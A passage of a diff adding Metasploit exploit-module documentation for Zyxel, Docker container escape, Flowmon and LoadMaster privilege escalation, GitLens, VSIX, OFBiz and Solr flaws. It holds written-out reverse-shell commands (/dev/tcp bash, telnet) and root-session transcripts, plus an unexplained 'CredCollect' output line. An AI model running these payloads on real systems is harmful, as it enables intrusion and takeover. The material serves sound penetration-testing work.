+The command injection is length limited to 0x14 bytes and is why this exploit chains a .qsr file write vulnerability as
+well in order to write the payload to a file which has no length limit and then call the payload with the command
+injection.
+
+Two caveats of this exploit chain were described by Jacob Baines in the following
+[blog post](https://vulncheck.com/blog/zyxel-cve-2023-33012#you-get-one-shot).
+1. In order for the target to be vulnerable Cloud Management Mode (SD-WAN mode) must be enable (it is not by default).
+2. The target can only be exploited once due to the order of operations in which the exploit functions.
+
+| Product                           | Affected Versions               |
+|-----------------------------------|----------------------------------|
+| ATP                               | V5.10 through V5.36 Patch 2      |
+| USG FLEX                          | V5.00 through V5.36 Patch 2      |
+| USG FLEX 50(W) / USG20(W)-VPN     | V5.10 through V5.36 Patch 2      |
+| VPN                               | V5.00 through V5.36 Patch 2      |
+
+### Setup
+
+To test this module you will need to acquire a hardware device running one of the vulnerable firmware versions listed above.
+
+## Options
+
+### WRITEABLE_DIR
+
+This indicates the location where you would like the payload and exploit stored, as well
+as serving as a location to store the various files and directories created by the exploit itself.
+The default value is `/tmp`
+
+## Verification Steps
+
+1. Start msfconsole
+1. Do: `use zyxel_parse_config_rce`
+1. Set the `RHOST` and `LHOST`
+1. Run the module
+1. Receive a Meterpreter session as the `root` user.
+
+## Scenarios
+### Mock USG Flex environment
+```
+msf6 exploit(linux/http/zyxel_parse_config_rce) > set payload cmd/unix/generic
+payload => cmd/unix/generic
+msf6 exploit(linux/http/zyxel_parse_config_rce) > set cmd id
+cmd => id
+msf6 exploit(linux/http/zyxel_parse_config_rce) > set AllowNoCleanup true
+AllowNoCleanup => true
+msf6 exploit(linux/http/zyxel_parse_config_rce) > run
+
+[*] Attempting to upload the payload via QSR file write...
+[+] File write was successful.
+[+] Command output:
+uid=0(root) gid=0(root) groups=0(root)
+
+[!] This exploit may require manual cleanup of '/tmp/N.qsr' on the target
+[*] Exploit completed, but no session was created.
+```

documentation/modules/exploit/linux/local/docker_privileged_container_kernel_escape.md

@@ -0,0 +1,110 @@
+## Vulnerable Application
+
+This module performs a container escape onto the host as the daemon user. It
+takes advantage of the SYS_MODULE capability. If that exists and the linux
+headers are available to compile on the target, then we can escape onto the host.
+
+### Creating A Testing Environment
+
+- Get a VM that you want to test on (or your own machine)
+- Install Docker
+- Run a listener (can be anything but this example will make use of the msfconsole `cmd/unix/reverse_bash` payload)
+```msf
+msf6 > use payload/cmd/unix/reverse_bash
+msf6 payload(cmd/unix/reverse_bash) > set lhost vboxnet0 
+lhost => 192.168.56.1
+msf6 payload(cmd/unix/reverse_bash) > generate -f raw
+bash -c '0<&118-;exec 118<>/dev/tcp/192.168.56.1/4444;sh <&118 >&118 2>&118'
+msf6 payload(cmd/unix/reverse_bash) > exploit -z
+[*] Payload Handler Started as Job 0
+msf6 payload(cmd/unix/reverse_bash) > 
+[*] [2023.11.07-21:28:57] Started reverse TCP handler on 192.168.56.1:4444
+```
+- Create a privileged container (forwarding port 4444 in this example in order
+to use a bind shell from the host. Container must be the same OS as host)
+```bash
+docker run --rm -it --cap-add SYS_MODULE ubuntu bash -c '0<&118-;exec 118<>/dev/tcp/192.168.56.1/4444;sh <&118 >&118 2>&118'
+```
+- Inside your session, install the required packages to run. Package manager will differ to OS, for debian as an example
+```bash
+apt update && apt install -y gcc make kmod linux-headers-$(uname -r)
+```
+
+## Verification Steps
+
+1. Start msfconsole
+2. Get a session
+3. Install required packages into session (line 30)
+4. Run `use exploit/linux/local/docker_privileged_container_kernel_escape`
+5. Run `set SESSION [session]`
+6. Run `check`
+7. Run `set PAYLOAD [payload]`
+8. Run `exploit`
+
+## Options
+
+### KernelModuleName
+
+The name that the kernel module will be called in the system. The default if no
+name is set is "{rand(8)}"
+
+### WritableContainerDir
+
+A directory where we can write files inside the container (default is `/tmp/.{rand(4)}`).
+This is needed to drop the payload into the container.
+
+### ReloadKernelModule
+
+Rebuilds and reloads kernel module if its already loaded in case of repeat runs.
+
+## Scenarios
+
+### Container Escape from debian linux with reverse bash
+
+```msf
+msf6 > sessions -i 1 -c "apt update && apt install -y gcc make kmod linux-headers-$(uname -r)"
+[*] Running 'apt update && apt install -y gcc make kmod linux-headers-$(uname -r)' on shell session 1 (192.168.56.126)
+msf6 > use exploit/linux/local/docker_privileged_container_kernel_escape 
+[*] Using configured payload cmd/unix/reverse_bash
+msf6 exploit(linux/local/docker_privileged_container_kernel_escape) > set session 1 
+session => 1
+msf6 exploit(linux/local/docker_privileged_container_kernel_escape) > check 
+[*] The target appears to be vulnerable. Inside Docker container and target appears vulnerable
+msf6 exploit(linux/local/docker_privileged_container_kernel_escape) > exploit -z
+
+[*] [2023.11.07-21:42:40] Started reverse TCP handler on 192.168.56.1:4444 
+[*] [2023.11.07-21:42:42] Creating files...
+[*] [2023.11.07-21:42:43] Compiling the kernel module...
+[+] [2023.11.07-21:42:43] Kernel module compiled successfully
+[*] [2023.11.07-21:42:43] Loading kernel module...
+[*] Command shell session 3 opened (192.168.56.1:4444 -> 192.168.56.126:60974) at 2023-11-07 21:42:50 -0500
+[*] This is CredCollect, I have the conn!
+```
+
+### Container Escape from arch linux with meterpreter
+
+```msf
+msf6 > sessions -i 2 -c "pacman -Syy --noconfirm gcc glibc make linux-headers"
+[*] Running 'pacman -Syy --noconfirm gcc glibc make linux-headers' on shell session 2 (192.168.56.106)
+msf6 > use exploit/linux/local/docker_privileged_container_kernel_escape 
+[*] Using configured payload cmd/unix/reverse_bash
+msf6 exploit(linux/local/docker_privileged_container_kernel_escape) > set session 2 
+session => 2
+msf6 exploit(linux/local/docker_privileged_container_kernel_escape) > set payload cmd/linux/http/x64/meterpreter/reverse_tcp 
+payload => cmd/linux/http/x64/meterpreter/reverse_tcp
+msf6 exploit(linux/local/docker_privileged_container_kernel_escape) > set lhost vboxnet0 
+lhost => vboxnet0
+msf6 exploit(linux/local/docker_privileged_container_kernel_escape) > check 
+[*] The target appears to be vulnerable. Inside Docker container and target appears vulnerable
+msf6 exploit(linux/local/docker_privileged_container_kernel_escape) > exploit -z
+
+[*] [2023.11.07-21:48:40] Started reverse TCP handler on 192.168.56.1:4444 
+[*] [2023.11.07-21:48:41] Creating files...
+[*] [2023.11.07-21:48:43] Compiling the kernel module...
+[+] [2023.11.07-21:48:44] Kernel module compiled successfully
+[*] [2023.11.07-21:48:44] Loading kernel module...
+[*] [2023.11.07-21:48:44] Sending stage (3045380 bytes) to 192.168.56.106
+[*] Meterpreter session 4 opened (192.168.56.1:4444 -> 192.168.56.106:50402) at 2023-11-07 21:48:45 -0500
+[*] This is CredCollect, I have the conn!
+[*] Session 4 created in the background.
+```

documentation/modules/exploit/linux/local/progress_flowmon_sudo_privesc_2024.md

@@ -0,0 +1,96 @@
+## Vulnerable Application
+Progress Flowmon up to at least version 12.3.2 is vulnerable to local privilege escalation from the
+`flowmon` user to `root`. This is possible due to the
+flowmon user being able to run several commands with
+`sudo`. This module exploits the ability to overwrite a
+PHP file and execute it with `sudo` granting full `sudo`
+permissions to the `flowmon` user and elevating the
+shell to a root shell.
+
+For more details on the vulnerability:
+https://rhinosecuritylabs.com/research/cve-2024-2389-in-progress-flowmon/ (privesc methods)
+
+https://support.kemptechnologies.com/hc/en-us/articles/24878235038733-CVE-2024-2389-Flowmon-critical-security-vulnerability
+
+This application is avaiable in cloud marketplaces:
+- https://portal.azure.com/#view/Microsoft_Azure_Marketplace/GalleryItemDetailsBladeNopdl/id/progresssoftwarecorporation.flowmon
+- https://aws.amazon.com/marketplace/pp/prodview-6phnrhkekuzka
+- https://console.cloud.google.com/marketplace/product/flowmon-public/flowmon-collector-for-google-cloud
+## Verification Steps
+1. Install the application
+1. Start msfconsole
+1. Gain a session on a Progress Kemp Loadmaster target as the `flowmon` user
+1. Do: `use exploits/linux/local/pprogress_flowmon_sudo_privesc_2024`
+1. Do: `set SESSION <session>`
+1. Do: `set LHOST <your host IP>`
+1. Do: `run`
+1. You should get a shell as the `root` user.
+
+## Scenarios
+
+### Flowmon 12.2
+
+```
+msf6 exploit(linux/local/progress_flowmon_sudo_privesc_2024) > sessions -l
+
+Active sessions
+===============
+
+  Id  Name  Type                   Information                                  Connection
+  --  ----  ----                   -----------                                  ----------
+  5         meterpreter x64/linux  flowmon @ localhost.localdomain.localdomain  192.168.2.23:4444 -> 192.168.2.26:38328 (192.168.2.26)
+
+msf6 exploit(linux/local/progress_flowmon_sudo_privesc_2024) > show options
+
+Module options (exploit/linux/local/progress_flowmon_sudo_privesc_2024):
+
+   Name          Current Setting  Required  Description
+   ----          ---------------  --------  -----------
+   SESSION       -1               yes       The session to run this module on
+   WRITABLE_DIR  /tmp             yes       A directory where we can write files
+
+
+Payload options (linux/x64/meterpreter/reverse_tcp):
+
+   Name   Current Setting  Required  Description
+   ----   ---------------  --------  -----------
+   LHOST  192.168.2.23     yes       The listen address (an interface may be specified)
+   LPORT  5555             yes       The listen port
+
+
+Exploit target:
+
+   Id  Name
+   --  ----
+   0   Automatic
+
+
+
+View the full module info with the info, or info -d command.
+
+msf6 exploit(linux/local/progress_flowmon_sudo_privesc) > run
+
+[*] Started reverse TCP handler on 192.168.2.23:5555
+[*] Running automatic check ("set AutoCheck false" to disable)
+[*] Found 2 indicators this is a Progress Flowmon product
+[!] The service is running, but could not be validated.
+[*] Saving payload as /tmp/.fovaiiazfuhl
+[*] Overwriting /var/www/shtml/index.php with payload
+[*] Executing sudo to elevate privileges
+[*] Transmitting intermediate stager...(126 bytes)
+[*] Sending stage (3045380 bytes) to 192.168.2.26
+[+] Deleted /tmp/.fovaiiazfuhl
+[*] Cleaning up addition to /etc/sudoers
+[*] Meterpreter session 9 opened (192.168.2.23:5555 -> 192.168.2.26:33408) at 2024-05-23 16:46:10 -0400
+[*] Restoring /var/www/shtml/index.php file contents...
+
+meterpreter > getuid
+Server username: root
+meterpreter > sysinfo
+Computer     : localhost.localdomain.localdomain
+OS           : CentOS 7.9.2009 (Linux 3.10.0-1160.102.1.el7.flowmon.x86_64)
+Architecture : x64
+BuildTuple   : x86_64-linux-musl
+Meterpreter  : x64/linux
+meterpreter >
+```

documentation/modules/exploit/linux/local/progress_kemp_loadmaster_sudo_privesc_2024.md

@@ -0,0 +1,188 @@
+## Vulnerable Application
+Progress Kemp LoadMaster up to at least 7.2.59.2.22338.  The vendor is aware of this "feature," but
+has chosen not to change the behavior.  It was originally paired with CVE-2024-1212, but as this
+privilege escalation was not patched when CVE-2024-1212 was, we split it into its own module.
+This exploit/feature allows the default `bal` user to run several binaries with the `sudo` prefix
+that will elevate without prompting for a password.  As the configuration is based on filename and
+the `bal` user has write permissions to these files, the `bal` user can simply write over the existing
+binary with one of their choosing, then prefix it with `sudo` and launch the binary with `root`
+privileges.
+This module defaults to overwrite `/bin/loadkeys` with `/bin/bash`, though other binaries would work,
+too.
+
+For more details on the vulnerability:  
+https://rhinosecuritylabs.com/research/cve-2024-1212unauthenticated-command-injection-in-progress-kemp-loadmaster/
+
+https://support.kemptechnologies.com/hc/en-us/articles/23878931058445-LoadMaster-Security-Vulnerability-CVE-2024-1212
+
+A trial VM which the exploit should work against out of the box can be downloaded from:
+https://sso.kemptechnologies.com/register/kemp/vlm
+
+The AWS marketplace also has free trials which can be used. These require the "session management" to be enabled in order for the exploit to work. Since by default the admin WUI is behind basic auth.
+https://aws.amazon.com/marketplace/pp/prodview-kgh3dsfk7qcnw
+
+Because this is an appliance, there are limited commands available for command-based payloads.
+
+## Verification Steps
+1. Install the application
+1. Start msfconsole
+1. Gain a session on a Progress Kemp Loadmaster target as the `bal` user
+1. Do: `use exploits/linux/local/progress_kemp_loadmaster_sudo_privesc_2024`
+1. Do: `set SESSION <session>`
+1. Do: `set LHOST <your host IP>`
+1. Do: `run`
+1. You should get a shell as the `root` user.
+
+## Scenarios
+
+### LoadMaster 7.2.59.0.22007
+#### Metasploit Binary Dropper Payload
+```msf
+msf6 exploit(linux/local/progress_kemp_loadmaster_sudo_privesc_2024) > show options
+
+Module options (exploit/linux/local/progress_kemp_loadmaster_sudo_privesc_2024):
+
+   Name           Current Setting  Required  Description
+   ----           ---------------  --------  -----------
+   SESSION        1                yes       The session to run this module on
+   TARGET_BINARY  /bin/loadkeys    yes       The path for a binary file that has permission to auto-elevate.
+   WRITABLE_DIR   /tmp             yes       A directory where we can write files
+
+
+Payload options (linux/x64/meterpreter_reverse_tcp):
+
+   Name   Current Setting  Required  Description
+   ----   ---------------  --------  -----------
+   LHOST  10.5.135.201     yes       The listen address (an interface may be specified)
+   LPORT  4444             yes       The listen port
+
+
+Exploit target:
+
+   Id  Name
+   --  ----
+   0   Dropper
+
+
+
+View the full module info with the info, or info -d command.
+
+msf6 exploit(linux/local/progress_kemp_loadmaster_sudo_privesc_2024) > run
+
+[*] Started reverse TCP handler on 10.5.135.201:4444 
+[*] Running automatic check ("set AutoCheck false" to disable)
+[*] Found 3 indicators this is a KEMP product
+[!] The service is running, but could not be validated.
+[*] Writing payload to /tmp/.rypuliojtdch
+[*] Moving /bin/loadkeys to /tmp/.qyiojnfbnfc
+[*] Moving /tmp/.rypuliojtdch to /bin/loadkeys
+[*] Running /bin/loadkeys
+[+] Deleted /tmp/.rypuliojtdch
+[*] Meterpreter session 2 opened (10.5.135.201:4444 -> 10.5.134.141:28850) at 2024-05-10 08:50:39 -0500
+[*] Moving /tmp/.qyiojnfbnfc to /bin/loadkeys
+[+] /bin/loadkeys returned to original contents
+
+meterpreter > sysinfo
+Computer     : 10.5.134.141
+OS           : SuSE 7.2 (Linux 4.14.137)
+Architecture : x64
+BuildTuple   : x86_64-linux-musl
+Meterpreter  : x64/linux
+meterpreter > getuid
+Server username: root
+meterpreter > 
+
+
+```
+
+#### Reverse Bash Command Payload
+```msf
+msf6 exploit(linux/local/progress_kemp_loadmaster_sudo_privesc_2024) > show options
+
+Module options (exploit/linux/local/progress_kemp_loadmaster_sudo_privesc_2024):
+
+   Name           Current Setting  Required  Description
+   ----           ---------------  --------  -----------
+   SESSION        1                yes       The session to run this module on
+   TARGET_BINARY  /bin/loadkeys    yes       The path for a binary file that has permission to auto-elevate.
+   WRITABLE_DIR   /tmp             yes       A directory where we can write files
+
+
+Payload options (cmd/unix/reverse):
+
+   Name   Current Setting  Required  Description
+   ----   ---------------  --------  -----------
+   LHOST  10.5.135.201     yes       The listen address (an interface may be specified)
+   LPORT  4444             yes       The listen port
+
+
+Exploit target:
+
+   Id  Name
+   --  ----
+   1   Command
+
+
+
+View the full module info with the info, or info -d command.
+
+msf6 exploit(linux/local/progress_kemp_loadmaster_sudo_privesc_2024) > run
+
+[+] sh -c '(sleep 4376|telnet 10.5.135.201 4444|while : ; do sh && break; done 2>&1|telnet 10.5.135.201 4444 >/dev/null 2>&1 &)'
+[*] Started reverse TCP double handler on 10.5.135.201:4444 
+[*] Running automatic check ("set AutoCheck false" to disable)
+[*] Found 3 indicators this is a KEMP product
+[!] The service is running, but could not be validated.
+[*] Preparing payload command
+[*] Moving /bin/loadkeys to /tmp/.mnqdvfwutfd
+[*] Moving /bin/bash to /bin/loadkeys
+[*] Running payload command
+[*] Accepted the first client connection...
+[*] Accepted the second client connection...
+[*] Command: echo igZFhKRnh9GplIdu;
+[*] Writing to socket A
+[*] Writing to socket B
+[*] Reading from sockets...
+[*] Reading from socket A
+[*] A: "sh: line 2: Connected: command not found\r\nsh: line 3: Escape: command not found\r\nigZFhKRnh9GplIdu\r\n"
+[*] 
+[*] Moving /tmp/.mnqdvfwutfd to /bin/loadkeys
+[*] Matching...
+[*] B is input...
+[+] /bin/loadkeys returned to original contents
+
+ls
+azurelinuxagent
+bin
+cgroup
+dev
+dmZPnkPUPoV
+etc
+initial_setup.sh
+lib
+lib64
+lost+found
+mnt
+one4net
+openssl
+proc
+root
+sbin
+sks
+sys
+tmp
+user
+usr
+var
+touch tempfile
+ls -l
+total 51
+drwxr-xr-x   5 root root  1024 Mar 22  2023 azurelinuxagent
+.
+.
+.
+-rw-r--r--   1 root root     0 May  3 17:02 tempfile
+.
+.
+drwxr-xr-x  12 root root  1024 Mar 21 17:29 var
+```

documentation/modules/exploit/multi/fileformat/gitlens_local_config_exec.md

@@ -0,0 +1,95 @@
+## Vulnerable Application
+
+GitKraken GitLens before v.14.0.0 allows an untrusted workspace to execute git
+commands. A repo may include its own .git folder including a malicious config file to
+execute arbitrary code.
+
+Tested against VSCode 1.87.2 with GitLens 13.6.0 on Ubuntu 22.04 and Windows 10
+
+### Install
+
+Download the extension [gitlens-13.6.0.vsix](https://github.com/gitkraken/vscode-gitlens/releases/download/v13.6.0/gitlens-13.6.0.vsix)
+
+1. In VSCode, go to extensions (left side, 4 blocks), click triple dots in top right corner, Auto Update Extensions -> None.
+1. In VSCode, go to extensions (left side, 4 blocks), click triple dots in top right corner, install from vsix.
+
+## Verification Steps
+
+1. Install the extension
+1. Start msfconsole
+1. Do: `use exploit/multi/fileformat/gitlens_local_config_exec`
+1. Do: `run`
+1. Unzip the repo
+1. Open the folder in Visual Studio Code
+1. When prompted, select "No, I don't trust the authors"
+1. Open the `README.md` file and put the cursor on the first line.
+1. You should get a shell.
+
+## Options
+
+### README
+
+The content of the `README.md` file. Defaults to `# Test`
+
+## Scenarios
+
+### VSCode 1.87.2 on Windows 10 Pro (22H2) with GitLens 13.6.0
+
+```
+[*] Processing gitlens.rb for ERB directives.
+resource (gitlens.rb)> use exploit/multi/fileformat/gitlens_local_config_exec
+[*] Using configured payload cmd/unix/reverse_bash
+resource (gitlens.rb)> set target 1
+target => 1
+resource (gitlens.rb)> set lhost 192.168.10.147
+lhost => 192.168.10.147
+msf6 exploit(multi/fileformat/gitlens_local_config_exec) > exploit
+
+[*] Started reverse TCP handler on 192.168.10.147:4444 
+[+] repo.zip stored at /root/.msf4/local/repo.zip
+[*] Waiting for shell
+```
+
+Unzip the repo, open the folder in Visual Studio Code. When prompted, select "No, I don't trust the authors". Open the `README.md` file and put the cursor on the first line.
+
+```
+[*] Sending stage (336 bytes) to 192.168.10.100
+[*] Command shell session 1 opened (192.168.10.147:4444 -> 192.168.10.100:62807) at 2024-03-19 17:46:46 +0000
+
+
+Shell Banner:
+Microsoft Windows [Version 10.0.19045.4170]
+-----
+          
+
+C:\Users\h00die\Desktop\repo>whoami
+whoami
+h00die
+
+C:\Users\h00die\Desktop\repo>
+```
+### VSCode 1.87.2 on Windows 10 Pro (1809), utilizing remote connection to Ubuntu 22.04 with GitLens 13.6.0 installed
+
+```
+$ ./msfconsole -qr gitlens.rb 
+[*] Processing gitlens.rb for ERB directives.
+resource (gitlens.rb)> use exploit/multi/fileformat/gitlens_local_config_exec
+[*] Using configured payload cmd/unix/reverse_bash
+resource (gitlens.rb)> set lhost 192.168.10.147
+lhost => 192.168.10.147
+msf6 exploit(multi/fileformat/gitlens_local_config_exec) > exploit
+
+[*] Started reverse TCP handler on 192.168.10.147:4444 
+[+] repo.zip stored at /root/.msf4/local/repo.zip
+[*] Waiting for shell
+```
+
+Unzip the repo, open the folder in Visual Studio Code. When prompted, select "No, I don't trust the authors". Open the `README.md` file and put the cursor on the first line.
+
+```
+[*] Command shell session 1 opened (192.168.10.147:4444 -> 192.168.10.147:53600) at 2024-03-19 18:26:04 +0000
+
+[*] Command shell session 2 opened (192.168.10.147:4444 -> 192.168.10.147:53612) at 2024-03-19 18:26:06 +0000
+id
+uid=1000(notroot) gid=1000(notroot) groups=1000(notroot),4(adm),24(cdrom),27(sudo),30(dip),46(plugdev),110(lxd),119(docker)
+```

documentation/modules/exploit/multi/fileformat/visual_studio_vsix_exec.md

@@ -0,0 +1,66 @@
+## Vulnerable Application
+
+Creates a vsix file which can be installed in Visual Studio Code as an extension.
+At activation/install, the extension will execute a shell or two.
+
+Tested against VSCode 1.87.2 on Ubuntu 22.04
+
+## Verification Steps
+
+1. Install VSCode
+1. Start msfconsole
+1. Do: `use exploit/multi/fileformat/visual_studio_vsix_exec`
+1. Do: `set lhost [IP]`
+1. Do: `run`
+1. In Visual Studio, click the extensions button on the left (4 boxes with the top
+right one offset)
+1. Click the 3 dots in the new window, select `Install from VSIX...`.
+1. Click the extension
+1. You should get a shell or two
+
+## Options
+
+### NAME
+
+The name of the extension. Defaults to `Code Reviewer`
+
+### DESCRIPTION
+
+The description of the extension. Defaults to `Reviews code`
+
+### VERSION
+
+The version of the extension. Defaults to `0.0.1`
+
+### README
+
+The readme contents for the extension. Defaults to ``
+
+## Scenarios
+
+### VSCode 1.87.2 on Ubuntu 22.04
+
+```
+msf6 > use exploit/multi/fileformat/visual_studio_vsix_exec
+[*] Using configured payload nodejs/shell_reverse_tcp
+msf6 exploit(multi/fileformat/visual_studio_vsix_exec) > set lport 5989
+lport => 5989
+msf6 exploit(multi/fileformat/visual_studio_vsix_exec) > set lhost 111.111.11.111
+lhost => 111.111.11.111
+msf6 exploit(multi/fileformat/visual_studio_vsix_exec) > exploit
+
+[*] Started reverse TCP handler on 111.111.11.111:5989 
+[+] extension.vsix stored at /root/.msf4/local/extension.vsix
+[*] Waiting for shell
+[*] Command shell session 1 opened (111.111.11.111:5989 -> 111.111.11.111:33070) at 2024-03-22 17:22:16 +0000
+
+[*] Command shell session 2 opened (111.111.11.111:5989 -> 111.111.11.111:33080) at 2024-03-22 17:22:16 +0000
+whoami
+h00die
+id
+uid=1000(h00die) gid=1000(h00die) groups=1000(h00die),4(adm),24(cdrom),27(sudo),30(dip),46(plugdev),110(lxd),119(docker)
+code -v   
+1.87.2
+863d2581ecda6849923a2118d93a088b0745d9d6
+x64
+```

documentation/modules/exploit/multi/http/apache_ofbiz_forgot_password_directory_traversal.md

@@ -0,0 +1,114 @@
+## Vulnerable Application
+Apache OFBiz versions prior to 18.12.13 are vulnerable to a path traversal vulnerability. The vulnerable
+endpoint `/webtools/control/forgotPassword` allows an attacker to access the `ProgramExport` endpoint which in
+turn allows for remote code execution in the context of the user running the application.
+
+### Description
+The module can exploit Apache OFBiz running on both Windows and Linux. OFBiz has list of `deniedWebShellTokens`
+which includes strings like `curl` and `chmod` which attempts to prevent ProgramExport from being exploited. The list
+can be bypassed if you encode your payload in unicode characters, which is what is done for payloads being sent to
+Apache OFBiz running on Linux. Trying to do the same on Windows results in the application throwing errors complaining
+about multiple characters.
+```
+      <p>The Following Errors Occurred:</p>
+        <p>org.codehaus.groovy.control.MultipleCompilationErrorsException: startup failed:
+Script1.groovy: 1: unexpected char: &#39;:&#39; @ line 1, column 49.
+```
+
+Which is why the following: `'BadChars' => "\x3a"` has been added. Adding BadChars changes the payload
+to be Base64 encoded and gets powershell to decode and run it: `powershell -w hidden -nop -e <Base64 encoded payload>`
+
+### Setup
+
+#### Docker
+
+1. Run the following docker command to spin up a vulnerable target:
+`docker run -p 8080:8080 -p 8443:8443 --rm -e INIT_DB=2 vulhub/ofbiz:18.12.09`
+
+#### Windows 10 (Build 19045)
+
+1. Download the Java 8 JDK from https://download.java.net/openjdk/jdk8u41/ri/openjdk-8u41-b04-windows-i586-14_jan_2020.zip
+1. Unzip the JDK to a target directory.
+1. Edit `JAVA_HOME` environment variable and set it to the location where you extracted the Java 8 JDK.
+1. Update the `PATH` environment variable to include a path to the same location as `JAVA_HOME`, but with `\bin` at the end of it.
+1. Download a vulnerable version of Apache OFBiz from https://archive.apache.org/dist/ofbiz/apache-ofbiz-18.12.12.zip
+1. Create the directory: `C:\ofbiz`.
+1. Unzip the contents of `apache-ofbiz-18.12.12.zip` into `C:\ofbiz`.
+1. Run `cd C:\ofbiz`.
+1. Run `init-gradle-wrapper` to initialize the Gradle wrapper.
+1. Run `.\gradlew cleanAll loadAll` to clean the system and load the complete OFBiz data.
+1. Once the above completes run `.\gradlew ofbiz` to start the application
+1. Navigate to `https://localhost:8443/webtools`
+
+
+## Verification Steps
+
+1. Start msfconsole
+1. Do: `use apache_ofbiz_forgot_password_directory_traversal`
+1. Set the `RHOST` and `LHOST` options
+1. Run the module
+1. Receive a session in the context of the user running Apache OFBiz.
+
+## Scenarios
+
+### Apache OFBiz 18.12.12 running on Windows 10 (Build 19045)
+```
+msf6 > use multi/http/apache_ofbiz_forgot_password_directory_traversal
+[*] Using configured payload cmd/windows/http/x64/meterpreter/reverse_tcp
+msf6 exploit(multi/http/apache_ofbiz_forgot_password_directory_traversal) > show targets
+
+Exploit targets:
+=================
+
+    Id  Name
+    --  ----
+=>  0   Linux Command
+    1   Windows Command
+    
+msf6 exploit(multi/http/apache_ofbiz_forgot_password_directory_traversal) > set target 1
+target => 1
+msf6 exploit(multi/http/apache_ofbiz_forgot_password_directory_traversal) > set payload cmd/windows/http/x64/meterpreter/reverse_tcp
+payload => cmd/windows/http/x64/meterpreter/reverse_tcp
+msf6 exploit(multi/http/apache_ofbiz_forgot_password_directory_traversal) > run rhosts=172.16.199.132 lhost=172.16.199.1
+
+[*] Started reverse TCP handler on 172.16.199.1:4444
+[*] Running automatic check ("set AutoCheck false" to disable)
+[+] The target is vulnerable. Tested remote code execution successfully
+[*] Attempting to exploit...
+[*] Sending stage (201798 bytes) to 172.16.199.132
+[*] Meterpreter session 1 opened (172.16.199.1:4444 -> 172.16.199.132:50788) at 2024-06-14 16:46:34 -0700
+
+meterpreter > getuid
+Server username: DESKTOP-N3ORU31\msfuser
+meterpreter > sysinfo
+Computer        : DESKTOP-N3ORU31
+OS              : Windows 10 (10.0 Build 19045).
+Architecture    : x64
+System Language : en_US
+Domain          : WORKGROUP
+Logged On Users : 2
+Meterpreter     : x64/windows
+meterpreter > exit
+```
+
+### Apache OFBiz 18.12.12 running in Docker on MacOS 14.5
+```
+msf6 exploit(multi/http/apache_ofbiz_forgot_password_directory_traversal) > run target=0 payload=cmd/linux/http/x64/meterpreter/reverse_tcp rhosts=172.16.199.1 lhost=172.16.199.1
+
+[*] Started reverse TCP handler on 172.16.199.1:4444
+[*] Running automatic check ("set AutoCheck false" to disable)
+[+] The target is vulnerable. Tested command injection successfully
+[*] Attempting to exploit...
+[*] Sending stage (3045380 bytes) to 172.16.199.1
+[*] Meterpreter session 2 opened (172.16.199.1:4444 -> 172.16.199.1:54454) at 2024-06-07 13:02:01 -0400
+
+meterpreter > getuid
+Server username: root
+meterpreter > sysinfo
+Computer     : 172.17.0.2
+OS           : Debian 11.4 (Linux 6.6.26-linuxkit)
+Architecture : x64
+BuildTuple   : x86_64-linux-musl
+Meterpreter  : x64/linux
+meterpreter >
+```

documentation/modules/exploit/multi/http/apache_solr_backup_restore.md

@@ -0,0 +1,279 @@
+## Vulnerable Application
+
+Apache Solr from 6.0.0 through 8.11.2, from 9.0.0 before 9.4.1 is affected by an Unrestricted Upload of File
+with Dangerous Type vulnerability which can result in remote code execution in the context of the user running
+Apache Solr. When Apache Solr creates a Collection, it will use a specific directory as the classpath and load
+some classes from it. The backup function of the Collection can export malicious class files uploaded by
+attackers to the directory, allowing Solr to load custom classes and create arbitrary Java code. Execution
+can further bypass the Java sandbox configured by Solr, ultimately causing arbitrary command execution.
+
+### Setup
+
+Install a vulnerable instance of Apache Solr with the following docker-compose file. The instance must be running in 
+"Cloud mode" in order to be vulnerable which is why the `-c` argument is included in the `solr start` command.
+
+#### Apache Solr 9.0.0 (no Authentication)
+```yml
+version: '3'
+
+services:
+  solr:
+    image: solr:9.0.0
+    ports:
+      - "8983:8983"
+      - "5005:5005"
+    command: sh -c "solr start -c -a '-agentlib:jdwp=transport=dt_socket,server=y,suspend=n,address=*:5005' && tail -f /dev/null"
+```
+
+#### Apache Solr with Authentication
+
+If Apache Solr is being run in Cloud mode with the Basic Authentication plugin then the `security.json` file must be 
+uploaded to zookeeper as explained in the following [documentation](https://solr.apache.org/guide/8_1/basic-authentication-plugin.html).
+This is why the following `docker-compose.yml` spins up an additional zookeeper image. 
+
+This is the directory structure that should be followed in order for the `docker-compose.yml` file to find the `security.json`
+file without any issues:
+```
+msfuser@msfuser-virtual-machine:~/solr/auth_docker$ tree
+.
+├── docker-compose.yml
+└── solr-cloud
+    └── security.json
+
+1 directory, 2 files
+```
+
+The following `security.json` file can be used for testing purposes. The file will create a user: `solr` with the
+the password: `SolrRocks`.
+
+```json
+{
+"authentication":{
+   "blockUnknown": true,
+   "class":"solr.BasicAuthPlugin",
+   "credentials":{"solr":"IV0EHq1OnNrj6gvRCwvFwTrZ1+z1oBbnQdiVC3otuq0= Ndd7LKvVBAaZIF0QAVi1ekCfAJXr1GGfLtRUXhgrF8c="},
+   "realm":"My Solr users",
+   "forwardCredentials": false
+},
+"authorization":{
+   "class":"solr.RuleBasedAuthorizationPlugin",
+   "permissions":[{"name":"security-edit",
+      "role":"admin"}],
+   "user-role":{"solr":"admin"}
+}}
+```
+
+
+```yml
+version: '3'
+services:
+  solr1:
+    image: solr:9.0.0
+    container_name: mysite-solr1
+    restart: always
+    ports:
+      - "8983:8983"
+    environment:
+      SOLR_OPTS: -Djute.maxbuffer=50000000
+      ZK_HOST: mysite-zoo1:2181
+      SOLR_HEAP: 1g
+    labels:
+      - 'traefik.backend=solr'
+      - 'traefik.port=8983'
+      - 'traefik.frontend.rule=Host:solr.mysite.localhost'
+    depends_on:
+      - zoo1
+    volumes:
+      - ./solr-cloud/security.json:/var/security.json
+      - .:/mnt/config
+      - solr1:/var/solr
+    command: bash -c "docker-entrypoint.sh solr zk cp file:/var/security.json zk:/security.json && exec solr-foreground"
+
+  zoo1:
+    image: zookeeper:3.6
+    container_name: mysite-zoo1
+    hostname: mysite-zoo1
+    restart: always
+    expose:
+      - 2181
+      - 7000
+    environment:
+      JVMFLAGS: -Djute.maxbuffer=50000000
+      ZOO_MY_ID: 1
+      ZOO_SERVERS: server.1=mysite-zoo1:2888:3888;2181
+      ZOO_4LW_COMMANDS_WHITELIST: mntr, conf, ruok
